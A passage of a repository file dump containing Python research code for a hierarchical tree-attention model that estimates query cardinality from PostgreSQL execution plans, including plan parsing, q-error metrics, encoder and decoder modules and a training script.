"text": "from typing import List\nimport numpy as np\n\n\ndef cal_q_error(predict, label, log=True):\n if log:\n predict = np.e**predict\n label = np.e**label\n if predict > label:\n q_error = predict / label\n else:\n q_error = label / predict\n return q_error\n\n\ndef print_qerror(q_error: List):\n print(\"max qerror: {:.4f}\".format(max(q_error)))\n print(\"mean qerror: {:.4f}\".format(np.mean(q_error)))\n print(\"media qerror: {:.4f}\".format(np.median(q_error)))\n print(\"90th qerror: {:.4f}\".format(np.percentile(q_error, 90)))\n print(\"95th qerror: {:.4f}\".format(np.percentile(q_error, 95)))\n print(\"99th qerror: {:.4f}\".format(np.percentile(q_error, 99)))\n"
},
{
"alpha_fraction": 0.6270502209663391,
"alphanum_fraction": 0.6329081058502197,
"avg_line_length": 34.73023223876953,
"blob_id": "95538ced84301da82ed4a296740a6d23398f2bc5",
"content_id": "3a313126f59ed8e702992afb65671d968d442719",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7682,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 215,
"path": "/util/prase_tree2node_leaf.py",
"repo_name": "JiTao3/hierarchical_attention",
"src_encoding": "UTF-8",
"text": "from typing import List\nfrom collections import deque\nimport copy\n\nimport numpy as np\nimport torch\n\nfrom util.plan_to_tree import Node, parse_dep_tree_text\n\n\ndef add_node_index(root: Node) -> Node:\n # add an index tu the tree to identify a node uniquely\n # so that we can jsutufy the ancenstral relationship between two node\n index = 1\n\n def add_index(root: Node):\n nonlocal index\n if not root:\n return -1\n\n root.index = index\n index += 1\n for child in root.children:\n add_index(child)\n\n add_index(root)\n return root\n\n\ndef is_ancestor(leaf: Node, node: Node) -> bool:\n # function to determine whether node is an ancester of leaf\n node_queue = deque([node])\n while node_queue:\n cnt_node = node_queue.popleft()\n for child in cnt_node.children:\n node_queue.append(child)\n if child.index == leaf.index:\n return True\n return False\n\n\ndef parse_tree2leaves_node(root: Node):\n leaf = []\n node = []\n\n def plan_tree_leaves_node(root: Node):\n # return the tree leaves and node list\n if root.children:\n node.append(root)\n for child in root.children:\n plan_tree_leaves_node(child)\n else:\n leaf.append(root)\n\n plan_tree_leaves_node(root)\n return leaf, node\n\n\ndef treeInterpolation(root: Node, leaf, node):\n # global FEATURE_LEN\n\n add_node_index(root)\n\n feature_len = leaf.shape[-1]\n leaf_order, node_order = parse_tree2leaves_node(root=root)\n\n tree_depth = len(node_order)\n tree_width = len(leaf_order)\n\n interpolation_vec = torch.zeros((tree_depth + 1, tree_width, feature_len), dtype=torch.double)\n\n for leaf_index in range(tree_width):\n interpolation_vec[tree_depth][leaf_index] = leaf[leaf_index]\n\n for leaf_index in range(tree_width):\n for node_index in range(tree_depth):\n if is_ancestor(leaf=leaf_order[leaf_index], node=node_order[node_index]):\n interpolation_vec[node_index][leaf_index] = node[node_index]\n hierarchical_embeddings_vec = hierarchical_embeddings(\n root=root, leaf_order=leaf_order, node_order=node_order, feature_len=feature_len\n )\n # print(torch.nonzero(hierarchical_embeddings_vec))\n # test_upward(interpolation_vec)\n return interpolation_vec + hierarchical_embeddings_vec\n\n\ndef vertical_deepth(node: Node, leaf: Node) -> int:\n deepth = 0\n node_queue = deque([node])\n # size = len(node_queue)\n while node_queue:\n size = len(node_queue)\n deepth += 1\n while size:\n cnt_node = node_queue.popleft()\n size -= 1\n for child in cnt_node.children:\n node_queue.append(child)\n if child.index == leaf.index:\n return deepth\n\n\ndef horizontal_width(root: Node) -> int:\n # if only root it will return root\n leaf, _ = parse_tree2leaves_node(root=root)\n return len(leaf)\n\n\ndef hierarchical_embeddings(root: Node, leaf_order: List, node_order: List, feature_len: int):\n # global FEATURE_LEN\n\n tree_depth = len(node_order)\n tree_width = len(leaf_order)\n # feature_len =\n vertical_len = feature_len // 2\n horizontal_len = feature_len // 2\n hierarchical_emebdding_vec = torch.zeros(\n (tree_depth + 1, tree_width, feature_len), dtype=torch.double)\n for leaf_index in range(tree_width):\n for node_index in range(tree_depth):\n node = node_order[node_index]\n leaf = leaf_order[leaf_index]\n if is_ancestor(leaf=leaf, node=node):\n depth = vertical_deepth(node=node, leaf=leaf)\n width = horizontal_width(root=node)\n # need to check depth and width < horizonal_len\n assert depth < horizontal_len and width < vertical_len\n hierarchical_emebdding_vec[node_index][leaf_index][depth - 1] = 1.0\n hierarchical_emebdding_vec[node_index][leaf_index][horizontal_len + width - 1] = 1.0\n return hierarchical_emebdding_vec\n\n\ndef upward_ca(interpolation_vec):\n interpolation_vec_cp = copy.copy(interpolation_vec)\n tree_depth, tree_width, feature_len = interpolation_vec.shape\n upward_ca_vec = torch.zeros((tree_depth - 1, tree_width, feature_len), dtype=torch.double)\n for leaf_index in range(tree_width):\n for node_index in range(tree_depth - 1):\n if interpolation_vec_cp[node_index][leaf_index].detach().numpy().any():\n # if(torch.is_nonzero(interpolation_vec[node_index][leaf_index])):\n num_not_null = 1\n upward_ca_vec[node_index][leaf_index] = interpolation_vec[tree_depth - 1][leaf_index]\n for in_node_index in range(node_index, tree_depth - 1):\n if interpolation_vec_cp[in_node_index][leaf_index].detach().numpy().any():\n # if(torch.is_nonzero(interpolation_vec[in_node_index][leaf_index])):\n upward_ca_vec[node_index][leaf_index] += interpolation_vec[in_node_index][leaf_index]\n num_not_null += 1\n # print(num_not_null)\n upward_ca_vec[node_index][leaf_index] /= num_not_null\n # test_upward(upward_ca_vec)\n return upward_ca_vec\n\n\ndef weightedAggregationCoeffi(root: Node):\n leaf_order, node_order = parse_tree2leaves_node(root=root)\n\n tree_depth = len(node_order)\n tree_width = len(leaf_order)\n agg_coeffi = torch.zeros((tree_depth), dtype=torch.double)\n agg_coeffi += torch.tensor([tree_width], dtype=torch.double)\n\n leaves_nodes = [parse_tree2leaves_node(rot) for rot in node_order]\n tree_size = [len(leaves) + len(nodes) for leaves, nodes in leaves_nodes]\n\n agg_coeffi += torch.tensor(tree_size, dtype=torch.double)\n return 1 / agg_coeffi\n\n\n# def weighted_aggregation(upward_ca_vec):\n# # upward ca vec with dim = node + 1 * leaf * d\n# dim = upward_ca_vec.shape[2]\n# no_zero = np.count_nonzero(upward_ca_vec, axis=(1, 2))/dim\n# upward_ca_sum = np.sum(upward_ca_vec, axis=1)\n\n# # no_zero * upward ca sum in each line\n\n# weighted_aggregation_vec = upward_ca_sum * np.expand_dims(no_zero, 1)\n# return weighted_aggregation_vec\n\n\ndef test_interpolation():\n plan_tree, max_children = parse_dep_tree_text(folder_name=\"./data\")\n add_node_index(plan_tree[1])\n leaf_order, node_order = parse_tree2leaves_node(root=plan_tree[1])\n tree_depth = len(node_order)\n tree_width = len(leaf_order)\n print(tree_depth, tree_width)\n test_interpolation = np.zeros((tree_depth, tree_width), dtype=np.double)\n for leaf_index in range(tree_width):\n for node_index in range(tree_depth):\n if is_ancestor(leaf=leaf_order[leaf_index], node=node_order[node_index]):\n test_interpolation[node_index][leaf_index] = 1\n print(test_interpolation)\n\n\ndef test_upward(upward_ca_vec):\n test_upward_vec = torch.sum(upward_ca_vec, dim=-1)\n print(torch.nonzero(test_upward_vec))\n\n\ndef tree2NodeLeafmat(root: Node):\n global FEATURE_LEN\n\n leaf_order, node_order = parse_tree2leaves_node(root)\n node_mat = np.array([node.data for node in node_order], dtype=np.double)\n leaf_mat = np.array([leaf.data for leaf in leaf_order], dtype=np.double)\n nodemat, leafmat = (torch.from_numpy(node_mat).double(), torch.from_numpy(leaf_mat).double())\n return nodemat, leafmat\n\n\nif __name__ == \"__main__\":\n # print(os.path.abspath('.'))\n plan_tree, max_children = parse_dep_tree_text(folder_name=\"./data\")\n add_node_index(plan_tree[1])\n leaf_order, node_order = parse_tree2leaves_node(root=plan_tree[1])\n"
},
{
"alpha_fraction": 0.508474588394165,
"alphanum_fraction": 0.5254237055778503,
"avg_line_length": 13.75,
"blob_id": "4c7562834ff7b9a63af959d1416a5a50b30e3341",
"content_id": "6c262bc609a40db233848c86710ba30bb09beb28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 59,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 4,
"path": "/util/__init__.py",
"repo_name": "JiTao3/hierarchical_attention",
"src_encoding": "UTF-8",
"text": "\n__all__=[\n 'plan_to_tree',\n 'prase_tree2node_leaf'\n]"
},
{
"alpha_fraction": 0.5592878460884094,
"alphanum_fraction": 0.587168276309967,
"avg_line_length": 33.61627960205078,
"blob_id": "00c983a47e3ddb0b90b2af96b8ea9e343911eecb",
"content_id": "131dadae14030dae6bf6d8ecc60b519969f24499",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2977,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 86,
"path": "/train.py",
"repo_name": "JiTao3/hierarchical_attention",
"src_encoding": "UTF-8",
"text": "import math\nfrom model.encoder import Encoder\nfrom util.dataset import PlanDataset\nimport torch\nimport torch.optim as optim\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader, random_split\nfrom torchsummary import summary\n\n# device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\ndataset = PlanDataset(root_dir=\"data/deep_cardinality\")\ndataloader = DataLoader(dataset, batch_size=1, shuffle=True)\n\ntrain_size = int(len(dataset) * 0.8)\ntest_size = len(dataset) - train_size\n\n\n# train_temp = [dataset[i] for i in range(10)]\n# test_temp = [dataset[i] for i in range(5)]\n\ntrain_dataset, test_dataset = random_split(dataset, [train_size, test_size])\n# train_loader = DataLoader(train_dataset, batch_size=1, shuffle=True, num_workers=2)\n# test_loader = DataLoader(test_dataset, batch_size=1, shuffle=False, num_workers=2)\n\nencoder = Encoder(d_feature=9 + 6 + 64, d_model=256, d_ff=128, N=4).double()\nsummary(encoder)\n\ncriterion = nn.MSELoss()\noptimizer = optim.Adam(encoder.parameters(), lr=0.001)\n\n\nepoch_size = 2\n\n\ndef train():\n result = []\n for epoch in range(epoch_size):\n print(\"epoch : \", epoch)\n running_loss = 0.0\n for i, data in enumerate(train_dataset):\n tree, nodemat, leafmat, label = data\n optimizer.zero_grad()\n output = encoder(tree, nodemat.double(), leafmat.double())\n # output = output\n if len(output.shape) > 1 or len(label.shape) > 1:\n print(\"output: {} ,label: {}\".format(len(output.shape), len(label.shape)))\n loss = criterion(output, label)\n loss.backward()\n optimizer.step()\n\n running_loss += loss.item()\n if math.isnan(running_loss):\n print(\"nan: \", i, \"\\t\", running_loss)\n\n if i % 200 == 0 and i != 0:\n print(\"[%d, %5d] loss: %4f\" % (epoch + 1, i + 1, running_loss / 200))\n running_loss = 0.0\n test_loss = 0.0\n with torch.no_grad():\n for i, data in enumerate(test_dataset):\n tree, nodemat, leafmat, label = data\n test_output = encoder(tree, nodemat, leafmat)\n if epoch == epoch_size - 1:\n result.append((label, test_output))\n loss = criterion(test_output, label)\n test_loss += loss.item()\n if i % 200 == 0 and i != 0:\n print(\"test loss: \", test_loss / test_size)\n return result\n\n\ndef dataset_test():\n for i, data in enumerate(test_dataset):\n tree, nodemat, leafmat, label = data\n print(label)\n\n\nif __name__ == \"__main__\":\n result = train()\n # result = [(1.1, 2.2), (3.3, 4.4), (5.5, 6.6)]\n with open(\"data/dmodel256/resutldeep_cv1.0dff128-e2-N4-lr0.001.txt\", \"w\") as f:\n f.write(\"\\n\".join(\"{} {}\".format(x[0].item(), x[1].item()) for x in result))\n\n # torch.save(encoder, \"model_parameter/encoderv1.0.pkl\")\n # dataset_test()\n"
},
{
"alpha_fraction": 0.6248477697372437,
"alphanum_fraction": 0.6277710199356079,
"avg_line_length": 32.64754104614258,
"blob_id": "05edd7571c854c454b7e7d0cd814cc03c7da54fb",
"content_id": "1f3183d9c34f9ec7972d79808708adb6d11d9dbc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4105,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 122,
"path": "/model/decoder.py",
"repo_name": "JiTao3/hierarchical_attention",
"src_encoding": "UTF-8",
"text": "from torch.autograd import Variable\nimport time\nimport copy\nimport math\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport torch\nimport numpy as np\nimport os\nimport sys\n\nsys.path.append(os.path.abspath(os.getcwd()))\nprint(sys.path)\n\nfrom util.plan_to_tree import Node, parse_dep_tree_text\nfrom util.prase_tree2node_leaf import (\n treeInterpolation,\n hierarchical_embeddings,\n upward_ca,\n tree2NodeLeafmat,\n)\nfrom model.encoder import attention, WeightedAggregation, LayerNorm, Reshape, clones\n\n\nclass DecoderLinear(nn.Module):\n def __init__(self, d_feature, d_model):\n super(DecoderLinear, self).__init__()\n self.query_linear = nn.Linear(d_model, d_feature)\n self.key_linear = nn.Linear(d_model, d_feature)\n self.vlaue_linear = nn.Linear(d_model, d_feature)\n\n def forward(self, x, target):\n value = self.value_linear(x)\n key = self.key_linear(x)\n query = self.query_linear(target)\n return value, key, query\n\n\nclass DecoderAttentionScaledDot(nn.Module):\n def __init__(self, d_feature, d_model, dropout=0.1):\n super(DecoderAttentionScaledDot, self).__init__()\n # self.decoderLiner = DecoderLinear(d_feature, d_model)\n self.dropout = nn.Dropout(p=dropout)\n\n def forward(self, q_target, node_k, leaf_k, mask=None):\n Aqn = attention(query=q_target, key=node_k, mask=mask, dropout=self.dropout)\n Aql = attention(query=q_target, key=leaf_k, mask=mask, dropout=self.dropout)\n return Aqn, Aql\n\n\nclass DecoderAttention(nn.Module):\n def __init__(self, d_feature, d_model):\n super(DecoderAttention, self).__init__()\n self.linear = DecoderLinear(d_feature=d_feature, d_model=d_model)\n self.scaledDot = DecoderAttentionScaledDot(d_feature=d_feature, d_model=d_model)\n self.weightedAgg = WeightedAggregation(d_feature)\n\n def forward(self, root, node, leaf, target):\n node_v, node_k, node_q = self.linear(node, target)\n leaf_v, leaf_k, leaf_q = self.linear(leaf, target)\n\n # node_q == leaf_q is target\n\n Aqn, Aql = self.scaledDot(node_q, node_k, leaf_k)\n\n # !!!! node_hat = ???\n\n # but you should keep the order of node?!!!\n # the order of node_q & node and leaf_q & leaf should be same\n # you should use parse tree 2 node leaf plan_tree_leaves_node to keep the order\n\n interpolation_vec = treeInterpolation(root=root, leaf=leaf_v, node=node_v)\n\n # node + 1 * leaf * d\n # you should use parse tree 2 node leaf plan_tree_leaves_node to keep the order\n\n upward_ca_vec = upward_ca(interpolation_vec)\n # upward_ca_tensor = torch.from_numpy(upward_ca_vec)\n\n node_hat = self.weightAgg(leaf, upward_ca_vec)\n leaf_hat = leaf_v\n\n # !!!! dim\n Attq = F.softmax(\n torch.matmul(\n torch.cat(Aqn, Aql), torch.cat(node_hat.double(), leaf_hat, dim=-2)\n )\n )\n return Attq\n\n\nclass DecoderLayer(nn.Module):\n def __init__(self, d_feature, d_model, d_ff):\n super(DecoderLayer, self).__init__()\n self.norm1 = LayerNorm(d_feature)\n self.norm2 = LayerNorm(d_feature)\n self.decoderAttention = DecoderAttention(d_feature, d_model)\n\n self.feed_forward = nn.Sequential(\n nn.Linear(d_model, d_ff), nn.ReLU(), nn.Linear(d_ff, d_model)\n )\n\n def forward(self, root, node_x, leaf_x, target):\n # !!! target + mask(norm(attention(target)))\n x = self.decoderAttention(root, node_x, leaf_x, target)\n x = x + self.norm1(x)\n x = self.feed_forward(x)\n x = x + self.norm2(x)\n return x\n\n\nclass Decoder(nn.Module):\n def __init__(self, d_feature, d_model, d_ff, N):\n super(Decoder, self).__init__()\n self.reshape = Reshape(d_feature=d_feature, d_model=d_model)\n self.layers = clones(DecoderLayer, N)\n\n def forward(self, root, node_x, leaf_x, target):\n target = self.reshape(target)\n for layer in self.layers:\n target = layer(root, node_x, leaf_x, target)\n return target\n"
},
{
"alpha_fraction": 0.5910897850990295,
"alphanum_fraction": 0.5997427701950073,
"avg_line_length": 34.485477447509766,
"blob_id": "bbb4f7a646d92f9e4599d4f0efa49d971a13c1c5",
"content_id": "745da2f92d1d83ea53a6a39a5b344d4774b94822",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8552,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 241,
"path": "/model/encoder.py",
"repo_name": "JiTao3/hierarchical_attention",
"src_encoding": "UTF-8",
"text": "import copy\nimport math\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport torch\nimport numpy as np\nimport os\nimport sys\n\nsys.path.append(os.path.abspath(os.getcwd()))\n# print(sys.path)\n\nfrom util.plan_to_tree import Node, parse_dep_tree_text\nfrom util.prase_tree2node_leaf import treeInterpolation, upward_ca, tree2NodeLeafmat, weightedAggregationCoeffi\nfrom util.dataset import PlanDataset\n\n\ndef clones(module, N):\n if N <= 0:\n return []\n else:\n return nn.ModuleList([copy.deepcopy(module) for _ in range(N)])\n\n\nclass LayerNorm(nn.Module):\n def __init__(self, feature, eps=1e-6):\n super(LayerNorm, self).__init__()\n self.a_2 = nn.Parameter(torch.ones(feature), requires_grad=True)\n self.b_2 = nn.Parameter(torch.zeros(feature), requires_grad=True)\n self.eps = eps\n\n def forward(self, x):\n mean = x.mean(-1, keepdim=True)\n std = x.std(-1, keepdim=True)\n return self.a_2 * (x - mean) / (std + self.eps) + self.b_2\n\n\ndef attention(query, key, mask=None, dropout=None):\n \"\"\"get score\"\"\"\n d_k = query.size(-1)\n scores = torch.matmul(query, key.transpose(-2, -1)) / math.sqrt(d_k)\n if mask is not None:\n scores = scores.masked_fill(mask == 0, -1e9)\n p_attn = F.softmax(scores, dim=-1)\n if dropout is not None:\n p_attn = dropout(p_attn)\n return p_attn\n\n\nclass TreeAttentionLinear(nn.Module):\n def __init__(self, d_feature, d_model, dropout=0.1):\n super(TreeAttentionLinear, self).__init__()\n self.query_linear = nn.Linear(d_feature, d_model)\n self.key_linear = nn.Linear(d_feature, d_model)\n self.vlaue_linear = nn.Linear(d_feature, d_model)\n\n def forward(self, x):\n q = self.query_linear(x)\n k = self.key_linear(x)\n v = self.vlaue_linear(x)\n return q, k, v\n\n\nclass TreeAttentionScaledDot(nn.Module):\n def __init__(self, d_feature, dropout=0.1):\n super(TreeAttentionScaledDot, self).__init__()\n # !!! use different dropout ???\n self.dropout = nn.Dropout(p=dropout)\n # self.leafLinear = nn.Linear(d_feature, d_feature)\n\n def forward(self, node_q, node_k, leaf_q, leaf_k, mask=None):\n Anl = attention(query=node_q, key=leaf_k, mask=mask, dropout=self.dropout)\n Ann = attention(query=node_q, key=node_k, mask=mask, dropout=self.dropout)\n All = attention(query=leaf_q, key=leaf_k, mask=mask, dropout=self.dropout)\n Aln = attention(query=leaf_q, key=node_k, mask=mask, dropout=self.dropout)\n\n return Anl, Ann, All, Aln\n\n\nclass WeightedAggregation(nn.Module):\n def __init__(self, d_feature):\n super(WeightedAggregation, self).__init__()\n # !!!\n self.u_s = nn.Parameter(torch.rand(d_feature, requires_grad=True))\n self.register_parameter(\"U_s\", self.u_s)\n self.d_featuer = d_feature\n\n def forward(self, root, leaf, upward_ca_vec):\n # omega size leaf * d\n omega = torch.matmul(leaf, self.u_s)\n # upward_ca_vec size node * leaf * d\n omega_shape = omega.shape[-1]\n weighted_aggregation_vec = upward_ca_vec * omega.reshape([1, omega_shape, 1])\n # no_zero shape node * 1\n # weight_aggregation_vec shape is node*leaf*d\n weighted_aggregation_vec = torch.sum(weighted_aggregation_vec, dim=1)\n # weight_aggregation_vec shape is node*d\n\n # upward_ca_vec_cp = copy.copy(upward_ca_vec)\n\n # nozero_div = (np.count_nonzero(upward_ca_vec_cp.detach().numpy(), axis=(1, 2)) + 1e-6) / self.d_featuer\n # no_zero = 1 / nozero_div\n # # no_zero_shape =\n # no_zero = torch.from_numpy(no_zero)\n\n # weighted_aggregation_vec = weighted_aggregation_vec * torch.unsqueeze(no_zero, 1)\n\n div = weightedAggregationCoeffi(root=root)\n weighted_aggregation_vec = weighted_aggregation_vec * torch.unsqueeze(div, 1)\n\n return weighted_aggregation_vec\n\n\nclass TreeAttention(nn.Module):\n def __init__(self, d_feature, d_model):\n super(TreeAttention, self).__init__()\n self.nodelinear = TreeAttentionLinear(d_feature=d_feature, d_model=d_model)\n self.leaflinear = TreeAttentionLinear(d_feature=d_feature, d_model=d_model)\n\n self.scaledDot = TreeAttentionScaledDot(d_feature=d_feature)\n self.weightAgg = WeightedAggregation(d_feature=d_feature)\n\n def forward(self, root: Node, node, leaf):\n\n node_q, node_k, node_v = self.nodelinear(node)\n leaf_q, leaf_k, leaf_v = self.leaflinear(leaf)\n Anl, Ann, All, Aln = self.scaledDot(node_q, node_k, leaf_q, leaf_k)\n # !!!! node_hat = ???\n\n # but you should keep the order of node?!!!\n # the order of node_q & node and leaf_q & leaf should be same\n # you should use parse tree 2 node leaf plan_tree_leaves_node to keep the order\n\n interpolation_vec = treeInterpolation(root=root, leaf=leaf_v, node=node_v)\n\n # node + 1 * leaf * d\n # you should use parse tree 2 node leaf plan_tree_leaves_node to keep the order\n\n upward_ca_vec = upward_ca(interpolation_vec)\n # upward_ca_tensor = torch.from_numpy(upward_ca_vec)\n\n node_hat = self.weightAgg(root, leaf, upward_ca_vec)\n leaf_hat = leaf_v\n\n # 1)!!! node_hat = ???\n\n # 2) cat the matrix and return attn and attl\n # !!! DIM\n # !!! mask\n # AnnAnl = torch.cat((Ann, Anl),dim=-1)\n # leafnodehat = torch.cat((node_hat.float(), leaf_hat),dim=-2)\n Attn = torch.matmul(\n F.softmax(torch.cat((Ann, Anl), dim=-1), dim=-2),\n torch.cat((node_hat, leaf_hat), dim=-2),\n )\n Attl = torch.matmul(\n F.softmax(torch.cat((Aln, All), dim=-1), dim=-2),\n torch.cat((node_hat, leaf_hat), dim=-2),\n )\n return Attn, Attl\n\n\nclass Reshape(nn.Module):\n def __init__(self, d_feature, d_model):\n super(Reshape, self).__init__()\n self.reshape = nn.Sequential(nn.Linear(d_feature, d_model), nn.ReLU())\n\n def forward(self, x):\n return self.reshape(x)\n\n\nclass EncoderLayer(nn.Module):\n def __init__(self, d_feature, d_model, d_ff):\n super(EncoderLayer, self).__init__()\n # self.reshape = nn.Linear(d_feature, d_model)\n self.treeattn = TreeAttention(d_feature, d_model)\n # Wo\n # !!! d\n self.linear = nn.Linear(d_model, d_model)\n # self.reshape = Reshape(d_feature, d_model)\n self.norm1 = LayerNorm(d_model)\n self.norm2 = LayerNorm(d_model)\n self.feed_forward = nn.Sequential(\n nn.Linear(d_model, d_ff),\n nn.ReLU(),\n nn.Linear(d_ff, d_ff // 2),\n nn.ReLU(),\n nn.Linear(d_ff // 2, d_model),\n nn.ReLU()\n )\n\n def forward(self, root, node, leaf):\n Attn, Attl = self.treeattn(root, node, leaf)\n Attno, Attlo = self.linear(Attn), self.linear(Attl)\n node_x = node + self.norm1(Attno)\n leaf_x = leaf + self.norm2(Attlo)\n feed_node_x = self.feed_forward(node_x)\n feed_leaf_x = self.feed_forward(leaf_x)\n node_x = node_x + self.norm2(feed_node_x)\n leaf_x = leaf_x + self.norm2(feed_leaf_x)\n return node_x, leaf_x\n\n\nclass Encoder(nn.Module):\n def __init__(self, d_feature, d_model, d_ff, N):\n super(Encoder, self).__init__()\n self.reshape = Reshape(d_feature=d_feature, d_model=d_model)\n self.firstEncoder = EncoderLayer(d_feature=d_feature, d_model=d_feature, d_ff=d_model)\n\n self.layers = clones(\n EncoderLayer(d_feature=d_model, d_model=d_model, d_ff=d_ff), N=N - 1\n )\n self.forward_net = nn.Sequential(\n nn.Linear(d_model, 1),\n nn.ReLU(),\n )\n\n def forward(self, root, node, leaf):\n # node = self.reshape(node)\n # leaf = self.reshape(leaf)\n node, leaf = self.firstEncoder(root, node, leaf)\n node, leaf = self.reshape(node), self.reshape(leaf)\n for layer in self.layers:\n node, leaf = layer(root, node, leaf)\n\n x = torch.cat((node, leaf), dim=-2)\n # max pool\n x = torch.max(x, dim=-2, keepdim=True)[0]\n x = self.forward_net(x)\n return x.squeeze(-1)\n\n\nif __name__ == \"__main__\":\n encoder = Encoder(d_feature=9 + 6 + 64, d_model=512, d_ff=512, N=2).double()\n dataset = PlanDataset(root_dir=\"data/deep_cardinality\")\n\n tree, nodemat, leafmat, label = dataset[51]\n print(nodemat.shape, leafmat.shape)\n\n x = encoder(tree, nodemat.double(), leafmat.double())\n print(x)\n"
},
{
"alpha_fraction": 0.4270382821559906,
"alphanum_fraction": 0.4355278015136719,
"avg_line_length": 38.512657165527344,
"blob_id": "5d870d4150c543d61be160ef57348822f89235e1",
"content_id": "9edf32462cccd86e2015039cf0dfafcaff459310",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18741,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 474,
"path": "/util/plan_to_tree.py",
"repo_name": "JiTao3/hierarchical_attention",
"src_encoding": "UTF-8",
"text": "import os\nimport numpy as np\n\noperators = [\n \"Merge Join\",\n \"Hash\",\n \"Index Only Scan using title_pkey on title t\",\n \"Sort\",\n \"Seq Scan\",\n \"Index Scan using title_pkey on title t\",\n \"Materialize\",\n \"Nested Loop\",\n \"Hash Join\",\n]\ncolumns = [\n \"ci.movie_id\",\n \"t.id\",\n \"mi_idx.movie_id\",\n \"mi.movie_id\",\n \"mc.movie_id\",\n \"mk.movie_id\",\n]\nscan_features = np.load(\"/home/jitao/hierarchical_attention/model_parameter/featuer_deep_cardinality.npy\")\n\n\ndef extract_time(line):\n data = line.replace(\"->\", \"\").lstrip().split(\" \")[-1].split(\" \")\n start_cost = data[0].split(\"..\")[0].replace(\"(cost=\", \"\")\n end_cost = data[0].split(\"..\")[1]\n rows = data[1].replace(\"rows=\", \"\")\n width = data[2].replace(\"width=\", \"\").replace(\")\", \"\")\n a_start_cost = data[4].split(\"..\")[0].replace(\"time=\", \"\")\n a_end_cost = data[4].split(\"..\")[1]\n a_rows = data[5].replace(\"rows=\", \"\")\n return (\n float(start_cost),\n float(end_cost),\n float(rows),\n float(width),\n float(a_start_cost),\n float(a_end_cost),\n float(a_rows),\n )\n\n\ndef extract_operator(line):\n operator = line.replace(\"->\", \"\").lstrip().split(\" \")[0]\n if operator.startswith(\"Seq Scan\"):\n operator = \"Seq Scan\"\n return operator, operator in operators\n\n\ndef extract_attributes(operator, line, feature_vec, i=None):\n operators = [\n \"Merge Join\",\n \"Hash\",\n \"Index Only Scan using title_pkey on title t\",\n \"Sort\",\n \"Seq Scan\",\n \"Index Scan using title_pkey on title t\",\n \"Materialize\",\n \"Nested Loop\",\n \"Hash Join\",\n ]\n columns = [\n \"ci.movie_id\",\n \"t.id\",\n \"mi_idx.movie_id\",\n \"mi.movie_id\",\n \"mc.movie_id\",\n \"mk.movie_id\",\n ]\n operators_count = len(operators) # 9\n if operator in [\"Hash\", \"Materialize\", \"Nested Loop\"]:\n pass\n elif operator == \"Merge Join\":\n if \"Cond\" in line:\n for column in columns:\n if column in line:\n feature_vec[columns.index(column) + operators_count] = 1.0\n elif operator == \"Index Only Scan using title_pkey on title t\":\n # feature_vec[15:56] = scan_features[i]\n if \"Cond\" in line:\n feature_vec[columns.index(\"t.id\") + operators_count] = 1.0\n for column in columns:\n if column in line:\n feature_vec[columns.index(column) + operators_count] = 1.0\n elif operator == \"Sort\":\n for column in columns:\n if column in line:\n feature_vec[columns.index(column) + operators_count] = 1.0\n elif operator == \"Index Scan using title_pkey on title t\":\n # feature_vec[15:56] = scan_features[i]\n if \"Cond\" in line:\n feature_vec[columns.index(\"t.id\") + operators_count] = 1.0\n for column in columns:\n if column in line:\n feature_vec[columns.index(column) + operators_count] = 1.0\n elif operator == \"Hash Join\":\n if \"Cond\" in line:\n for column in columns:\n if column in line:\n feature_vec[columns.index(column) + operators_count] = 1.0\n elif operator == \"Seq Scan\":\n feature_vec[15:79] = scan_features[i] # 64\n\n\n\"\"\"Tree node class\"\"\"\n\n\nclass Node(object):\n def __init__(self, data, parent=None, index=-1):\n self.data = data\n self.children = []\n self.parent = parent\n self.index = index\n\n def add_child(self, obj):\n self.children.append(obj)\n\n def add_parent(self, obj):\n self.parent = obj\n\n def __str__(self, tabs=0):\n tab_spaces = str.join(\"\", [\" \" for i in range(tabs)])\n return (\n tab_spaces + \"+-- Node: \" + str.join(\"|\", self.data) + \"\\n\" +\n str.join(\"\\n\", [child.__str__(tabs + 2) for child in self.children])\n )\n\n\ndef parse_dep_tree_text(folder_name=\"data\"):\n scan_cnt = 0\n max_children = 0\n plan_trees = []\n feature_len = 9 + 6 + 7 + 64\n for each_plan in sorted(os.listdir(folder_name)):\n # print(each_plan)\n with open(os.path.join(folder_name, each_plan), \"r\") as f:\n lines = f.readlines()\n feature_vec = [0.0] * feature_len\n operator, in_operators = extract_operator(lines[0])\n if not in_operators:\n operator, in_operators = extract_operator(lines[1])\n start_cost, end_cost, rows, width, a_start_cost, a_end_cost, a_rows = extract_time(\n lines[1]\n )\n j = 2\n else:\n start_cost, end_cost, rows, width, a_start_cost, a_end_cost, a_rows = extract_time(\n lines[0]\n )\n j = 1\n feature_vec[feature_len - 7: feature_len] = [\n start_cost,\n end_cost,\n rows,\n width,\n a_start_cost,\n a_end_cost,\n a_rows,\n ]\n feature_vec[operators.index(operator)] = 1.0\n if operator == \"Seq Scan\":\n extract_attributes(operator, lines[j], feature_vec, scan_cnt)\n scan_cnt += 1\n root_tokens = feature_vec\n current_node = Node(root_tokens)\n plan_trees.append(current_node)\n continue\n else:\n while \"actual\" not in lines[j] and \"Plan\" not in lines[j]:\n extract_attributes(operator, lines[j], feature_vec)\n j += 1\n root_tokens = feature_vec # 所有吗\n current_node = Node(root_tokens)\n plan_trees.append(current_node)\n\n spaces = 0\n node_stack = []\n i = j\n while not lines[i].startswith(\"Planning time\"):\n line = lines[i]\n i += 1\n if line.startswith(\"Planning time\") or line.startswith(\n \"Execution time\"\n ):\n break\n elif line.strip() == \"\":\n 